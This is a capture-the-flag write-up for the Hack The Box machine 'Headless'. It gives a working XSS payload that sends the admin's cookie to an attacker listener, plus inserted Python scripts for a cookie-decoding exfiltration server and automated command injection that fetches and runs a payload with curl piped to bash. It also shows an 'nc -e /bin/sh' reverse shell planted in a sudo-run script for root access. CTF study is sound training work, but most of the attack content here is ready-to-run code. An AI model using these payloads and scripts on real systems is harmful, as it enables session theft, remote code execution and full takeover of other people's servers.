Headless Hack The Box (HTB) Write-Up

TechnoLifts
6 min read · Apr 1, 2024


Today we are jumping into the Season 4 Easy Box — Headless

Headless was an interesting box. An nmap scan revealed a web application on port 5000. Enumerating it with gobuster turned up an admin dashboard, but we could not access it. Back on the original site we used Burp Suite to deliver an XSS payload through the support form, which leaked the admin cookie to our listener. With that cookie we could reach the URL gobuster had found, and from there we modified a POST request to get a reverse shell and the user flag. For privilege escalation we planted a payload in a script that a sudo-runnable program executes, which gave us a root shell and the root flag. Let's jump into the specifics.

Reconnaissance

nmap scan:

We add headless.htb to /etc/hosts with the IP address given for the box. Then we navigate to http://{ip}:{port}, in our case http://headless.htb:5000 or http://10.10.11.8:5000, and do some simple browsing. On the home page we click "for questions" and are taken to a support page.

I try submitting some ordinary input and nothing happens, so before I go down a rabbit hole I start a gobuster directory enumeration to see whether there are any other hidden directories we can access.

Directory Enumeration

We find /dashboard so we go check that out

Hmm, so to access /dashboard we either need to be logged in as a user with elevated privileges (admin), but I don't see a login page, or we need to convince the server that we are authorized to access the URL. When I think about tricking the server, I think about presenting it with an admin cookie or an admin session ID. For more info on the difference visit here.

Initial Exploit

I look online for how to steal cookies using XSS and find this page, where I see the following:

I head back to the /support page in Burp Suite, where I can modify the requests we send to the server and insert the payload found above. Make sure you replace the IP address with your own; you can find it by running "ifconfig" in your CLI. Also make sure the IP address is followed by :{port}, where {port} is whatever port you start your server on.

First I start up my python server on port 8001

python3 -m http.server 8001

Then I capture the request in Burp

To do this, open Burp and its browser and head to the /support page. Turn intercept on in Burp, fill in some random values and press submit; Burp catches the request. Right-click the request and choose "Send to Repeater" so we can try several variations without recapturing the page. Once there, we get our payload ready. In my case:

<script>var i=new Image(); i.src="http://10.10.14.208:8001/?cookie="+btoa(document.cookie);</script>

We try putting this in different “fields” until our server picks something up.

After putting the payload in the User-Agent header, my server picked up the cookie. It arrives base64-encoded because our payload wrapped document.cookie in btoa(), so we decode it:

echo "aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA=" | base64 -d
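As an added example (not the author's code), here is a small stand-in for python -m http.server that decodes the exfiltrated cookie as it arrives instead of leaving you to copy the base64 out of the access log. It assumes the payload shape used above (?cookie=btoa(document.cookie)); the "+" handling is there because a browser sends "+" literally in a query string and a query parser then turns it into a space, which would break the base64 decode.

```python
import base64
import binascii
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

LISTEN_PORT = 8001  # same port as the python -m http.server used in the write-up


def xss_payload(host, port):
    """The cookie-stealing <script> from the write-up, parameterised on our listener."""
    return (f'<script>var i=new Image(); '
            f'i.src="http://{host}:{port}/?cookie="+btoa(document.cookie);</script>')


def decode_cookie_param(path):
    """Return document.cookie from a request path like /?cookie=<base64>,
    or None when the request is not an exfil hit (favicon, probes, junk)."""
    values = parse_qs(urlparse(path).query).get("cookie")
    if not values:
        return None
    # btoa() output may contain '+', which the browser sends literally and
    # parse_qs then decodes as a space; put it back before base64-decoding.
    b64 = values[0].replace(" ", "+")
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def split_cookies(cookie_string):
    """'a=1; b=2' -> {'a': '1', 'b': '2'} so we can pull out is_admin directly."""
    jar = {}
    for part in cookie_string.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            jar[name] = value
    return jar


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        cookie = decode_cookie_param(self.path)
        if cookie is not None:
            print(f"[+] cookie from {self.client_address[0]}: {split_cookies(cookie)}")
        # Answer with a tiny GIF so the <img> load looks like an ordinary tracking pixel.
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(b"GIF89a")


if __name__ == "__main__":
    # Attacker address is an assumption; use your own tun0 IP.
    print(xss_payload("10.10.14.208", LISTEN_PORT))
    HTTPServer(("0.0.0.0", LISTEN_PORT), ExfilHandler).serve_forever()
```

Run it in place of the http.server, paste the printed payload into the User-Agent header in Repeater, and the decoded is_admin value shows up on the console when the admin's browser loads the image.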

That gives is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0. The value looks like a signed token (a base64 part, here the JSON string "admin", followed by a dot and a signature), so we could not simply have guessed it; stealing it from the admin's browser was the way in. Now that we have the cookie we head back to /dashboard and repeat the Burp routine, this time inserting a Cookie header into the request. Step by step:

  1. With intercept off in Burp, head to http://headless.htb:5000/dashboard in the Burp browser
  2. Turn intercept on in Burp
  3. Refresh the http://headless.htb:5000/dashboard page
  4. In the Proxy tab add the header Cookie: {cookie} to the intercepted request
  5. Press "Forward"

From here we need to assess what options we have. The date field takes user input, which is where I usually like to look first. Now that we are behind a protected page, can we get a shell? Let's give it a shot. I make a file named payload.sh with the following inside it.

The IP address should be your own IP address, and the /1111 is the port I'm going to open my netcat listener on.

Make sure you did not close the server you started earlier (on port 8001 in my case); we need it to serve the payload file. Also make sure the server is running in the same directory as your payload file.

Back on /dashboard press "Generate Report" and catch the request in Burp. We want to replace the date value with a command that fetches the payload file we created and runs it; the dashboard evidently hands that value to a shell. Make sure your admin cookie is in the Cookie header of this request too.
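The same Generate Report step, as an added example that is not from the write-up: a standard-library Python script that replays the request with the stolen cookie and the command chained onto the date value. The form field name "date", the ";" separator, the curl-pipe-to-bash stager and the decoded cookie value are assumptions based on the description above; adjust them to whatever Burp actually shows. The probe() command is a cheap way to confirm injection works (your http.server logs a hit) before firing the reverse shell.

```python
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Assumed values (not taken from the write-up): adjust to your own setup.
DASHBOARD = "http://headless.htb:5000/dashboard"
ADMIN_COOKIE = "is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0"
ATTACKER = "10.10.14.208"
HTTP_PORT = 8001


def probe(host, port):
    """Harmless callback: if the listener logs GET /ping, the date value reaches a shell."""
    return f"curl -s http://{host}:{port}/ping"


def stager(host, port, script="payload.sh"):
    """Fetch payload.sh from our python http.server and execute it."""
    return f"curl -s http://{host}:{port}/{script} | bash"


def inject_date(command, date="2023-09-15"):
    """Keep a plausible date so the handler reaches its shell call, then chain ours."""
    return f"{date};{command}"


def build_report_request(url, cookie, command):
    """POST /dashboard exactly as the browser would, plus our Cookie header."""
    body = urlencode({"date": inject_date(command)}).encode()
    headers = {
        "Cookie": cookie,
        "Content-Type": "application/x-www-form-urlencoded",
    }
    return Request(url, data=body, headers=headers, method="POST")


def send(req):
    with urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    # 1) confirm injection with the probe, 2) start nc listener, 3) send the stager
    print(send(build_report_request(DASHBOARD, ADMIN_COOKIE, probe(ATTACKER, HTTP_PORT))))
    print(send(build_report_request(DASHBOARD, ADMIN_COOKIE, stager(ATTACKER, HTTP_PORT))))
```

Note that urlencode percent-encodes the ";" and "|" for you; the server decodes the form body before it reaches the shell, which is why the raw Burp request shows them as %3B and %7C.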

Boom, we are in a shell as user dvir. Some basic discovery turns up the user flag:

Root Flag

The first thing I think of doing is checking what privileges the user I'm logged in as has. I run "sudo -l" to do this.

It looks like we can run /usr/bin/syscheck with sudo. Let's take a closer look by catting out the contents.

We see that it launches a script called initdb.sh from the current directory rather than an absolute, root-owned path, so whatever initdb.sh we create in our working directory is what runs as root. We put our payload in that file.

echo "nc -e /bin/sh 10.10.14.208 1212" > initdb.sh
chmod +x initdb.sh

The echo writes the reverse shell one-liner that follows it into initdb.sh, creating or overwriting the file. The chmod line makes the file executable.

Next, open a netcat listener on whatever port you put in the payload (1212 in my case, e.g. nc -lvnp 1212), then run syscheck through sudo from the directory holding your initdb.sh and your listener will receive a connection.

The shell isn't stable, so I stabilize it with these instructions. After running those commands we are root, which we can confirm with "whoami".

cd .. up to the root directory, where you can find the flag.

Cheers everyone, Happy Hacking,

Techno
